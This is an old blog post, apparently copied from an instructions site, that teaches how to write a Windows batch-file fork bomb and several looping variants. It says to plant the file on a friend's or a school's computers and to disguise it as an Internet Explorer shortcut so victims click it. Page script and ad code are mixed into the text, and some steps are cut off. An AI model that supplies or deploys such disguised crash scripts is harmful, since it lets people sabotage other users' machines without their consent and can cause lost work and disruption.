Wednesday, March 10, 2010

How to crash your computer

introHow to crash your computer
Very Simple . . .

image not found
i
InstructJS.load(['instruct','imagespot'], function () {var spotspot507930 = new ImageSpot( 'spot507930', { loadID: 'F676WD2FGZO0C7S', editimagedata: 'false', imageDataEditorPlace: '', showInfo: true, size: 'MEDIUM' } );
new ImageInfo( spotspot507930, {"imageID":"F676WD2FGZO0C7S","name":"crash.jpg","imageURL":"/files/deriv/F67/6WD2/FGZO0C7S/F676WD2FGZO0C7S.MEDIUM.jpg","showURL":"/file/F676WD2FGZO0C7S/","description":null,"length":208630,"width":1280,"height":1024} );
info = new ImageInfo( spotspot507930, {"imageID":"F676WD2FGZO0C7S","name":"crash.jpg","imageURL":"/files/deriv/F67/6WD2/FGZO0C7S/F676WD2FGZO0C7S.MEDIUM.jpg","showURL":"/file/F676WD2FGZO0C7S/","description":null,"length":208630,"width":1280,"height":1024} ).imageURL = '/image/F676WD2FGZO0C7S/How-to-crash-your-computer.jpg';
spotspot507930.register(info); InstructJS.cachedRefs.spotspot507930=spotspot507930;runAfterDomLoad(spotspot507930.eventWindowLoaded); });


// help bubbles
InstructJS.load(["helpbubble"], function () {
//Helper text and dummy fxn for non-logged-in users
function makeHelpBubbleFileText() {
return 'Membership Benefit!'
+ 'To download attached files, please '
+ ''
+ 'sign up
or login.'
+ makeHelpBubbleLoginHTML('?files#files')
+ '';
}
$("files").select("span").each( function( file ) {
//
if ( file && file.down("a") && file.down("a").down("img") ) {
new HelpBubble({
clickEl : file.down("a"),
width: 200,
popUp: true,
contents : makeHelpBubbleFileText(),
additionalActions: focusOnHelpBubbleLogin
});
}
//
});
});


GA_googleFillSlot("tech_inline_med_rectangle");


GA_googleFillSlot("rightside_inline_med_rectangle");

Remove these ads by Signing Up.
To View All Steps on one page, Go Pro Today!
step 1Just go to notepadJust go to notepad (startall programsaccessoriesnotepad) and type exactly this script btween the lines: ___________________________________________________________________@echo off:crashstartgoto crash___________________________________________________________________
step 2Save as .batgoto filesave ascrash.bat and save! But remember when you open this file command prompt windows will open until the computer crashes or freezes so it would be better if you placed this on a friend's or the school's computers.
step 3Different variationsThere are different scripts that you can write in notepad to get a batch file with similar reactions. such as: ________________@echo off:startstart %0goto start_________________or_________________@echo off:1start iexplore.exegoto 1_________________or_________________@echo off:foldermd *goto folder_________________or_________________@echo off:1startecho Windows is now cr…
step 4Disguise itWhen you place this file on someone else's computer you have to make the file look persuasive to click on desktop. So find the crash.bat file in documents or all files, right-click itsend todesktop(create shortcut). Now find it on your desktopright clickpropertieschange iconchange it to nternet explorer iconapplyexit. Right click it againrenamerename to: Internet Expl…
step 5Recovering from the crashTo recover your desktop (PC) from this just directly pull the plugs from your PC and put the plugs back in and start it up again or just hold the power button on your PC until it turns off and restart again. I'm not sure about how to recover from this with labtops.

No comments:

Explaining DNS Concepts - DNS Servers-DNS Queries-DNS Records

3 types of DNS queries— recursive, iterative, and non-recursive 3 types of DNS servers— DNS Resolver, DNS Root Server and Authoritative Name...